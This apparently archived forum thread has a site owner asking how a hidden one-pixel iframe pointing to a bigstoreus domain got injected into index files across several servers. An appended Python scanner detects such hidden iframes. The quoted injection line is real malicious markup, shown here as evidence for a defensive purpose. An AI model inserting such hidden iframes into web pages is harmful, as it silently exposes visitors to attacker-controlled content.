Full Version: bigstoreus iframe
salinger
Somebody inserted the following iframe on many websites (index files only) hosted on different servers
CODE
<iframe src=http://www.bigstoreus .info width=1 height=1 style="display:none"></iframe>


and I'm wondering how they did it? All index files are CHMODed 644, only the owner has the permission to modify them...

They used a security hole? Any ideas greatly appreciated!
markcausa
Well, for one thing, the hacker doesn't know how to type valid HTML...

Honestly, I have no idea. Are you running any popular PHP software like PHPBB, IPB, etc?
salinger
I run IPB, only on one server...
markcausa
Ok, I'm trying to find out if you have any scripts that allow input from visitors. Do you?
salinger
Not on all servers.

I think the problem is more complex... they use something more complicated, they don't exploit the scripts. At least not the CMS 'cause I have different CMSes on servers - from the latest version of Wordpress to custom made CMSes.



Later edit. For those who have the same problem, read here:
http://news.netcraft.com/archives/2006/09/..._mass_hack.html
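
Added example (not part of the thread and not any poster's code): a small scanner that walks a web root and flags index files containing an invisible iframe like the one quoted in the first post, tolerating unquoted attributes. The function names, the sample docroot and the injected.example / video.example hosts are constructed for illustration; the reported mtime is there so a finding can be lined up against FTP and access logs.

```python
import os
import re
import tempfile

# Opening <iframe ...> tag; attributes may be unquoted, as in the injected snippet.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
DIM_RE = re.compile(r"""\b(width|height)\s*=\s*["']?(\d+)""", re.IGNORECASE)
HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)

def hidden_iframes(html):
    """Return iframe tags that are invisible: 0/1-pixel size or hidden via CSS."""
    hits = []
    for tag in IFRAME_RE.findall(html):
        dims = {k.lower(): int(v) for k, v in DIM_RE.findall(tag)}
        tiny = any(dims.get(k, 100) <= 1 for k in ("width", "height"))
        if tiny or HIDDEN_RE.search(tag):
            hits.append(tag)
    return hits

def scan_index_files(root):
    """Walk root; return (path, tag, mtime) for index.* files with hidden iframes."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().startswith("index."):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", errors="replace") as fh:
                for tag in hidden_iframes(fh.read()):
                    findings.append((path, tag, os.path.getmtime(path)))
    return findings

def demo():
    """Constructed docroot: one clean index file, one tampered; returns flagged names."""
    bad = ('<html><body>hi</body></html>\n<iframe src=http://injected.example '
           'width=1 height=1 style="display:none"></iframe>')
    good = '<html><iframe src="https://video.example/e" width="560" height="315"></iframe></html>'
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "site_a"))
        for rel, body in (("index.html", good), (os.path.join("site_a", "index.php"), bad)):
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(body)
        return sorted(os.path.basename(p) for p, _tag, _m in scan_index_files(root))

if __name__ == "__main__":
    print(demo())
```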